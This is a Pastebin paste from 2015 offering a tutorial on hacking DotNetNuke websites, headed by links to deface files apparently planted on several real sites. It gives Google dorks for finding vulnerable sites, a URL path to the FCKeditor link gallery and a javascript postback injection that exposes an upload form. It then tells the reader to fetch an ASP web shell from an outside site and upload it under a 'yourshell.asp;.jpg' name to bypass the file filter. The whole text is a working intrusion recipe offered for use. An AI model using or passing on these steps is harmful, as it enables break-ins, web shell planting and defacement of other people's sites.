API tools faq
paste
Kyfx

DNN ( DotNetNuke ) Website Hacking Tut and Drop Defaces

Kyfx
Oct 30th, 2015
269
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.12 KB | None | 0 0
raw download clone embed print report
  1.  
  2. Hax
  3.  
  4. http://www.iiit.org/portals/0/kyfx.txt
  5. http://www.lokc.org/portals/0/kyfx.txt
  6. http://www.forbes-av.com/portals/0/Kyfx.txt
  7. http://www.bwwines.com/portals/0/Kyfx.txt
  8.  
  9.  
  10. How To Hack Websites Using DotNetNuke Exploit + Shell Uploading
  11. Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. B
  12. y using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.
  13. What is DNN (Dot Net Nuke) ?
  14. DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
  15. Step 1: First go to google.com search page and use this following dork to find vulnerable site.
  16. inurl:home/tabid/36/language/en-US/Default.aspx
  17. another dorks you can use
  18. inurl:fcklinkgallery.aspx
  19. inurl:/portals/0
  20. Step 2: Now open any site from the search list like
  21. http://www.vulsite.com/…/tab…/36/language/en-US/Default.aspx
  22. Now replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  23. so your url will become
  24. http://www.vulsite.com/…/HtmlEditor…/Fck/fcklinkgallery.aspx
  25.  
  26. Step 3: Now there are 2 possibilities
  27. if u get Link Gallery url select then site is not vulnerable , see the image below :
  28. http://1.bp.blogspot.com/…/nGf…/s1600/website%2Bhacking1.jpg
  29. and If you get Like shown in below image then target is vulnerable :
  30. http://3.bp.blogspot.com/…/r3g…/s1600/website%2Bhacking2.jpg
  31. ok now if you find a vulnerable site move to next step
  32. Step 4: Now you can see 3 options there and we neeed to select “File in your site”.
  33. http://3.bp.blogspot.com/…/29B…/s1600/website%2Bhacking3.jpg
  34. Step 5: Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .
  35. Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.
  36. javascript:__doPostBack('ctlURL$cmdUpload','')
  37.  
  38. Step 6: After inject the above javascript code in browser address bar, you will get upload option instead of selection option.
  39. http://2.bp.blogspot.com/…/dOg…/s1600/website%2Bhacking4.jpg
  40. Step 7: Now you have to upload your shell.
  41. Note : But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg
  42. So for this purpose first we need to upload a special type of shell which is specially coded in asp.
  43. Download the shell :- goto www.sh3ll.org .
  44. Now rename your asp shell to
  45. yourshell.asp;.jpg
  46. and upload it.
  47. After uploading you can access your ASP shell by going to this address,
  48.  
  49.  
  50. OPen:http://www.vulsite.com/portals/0/yourshell.asp;.jpg
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!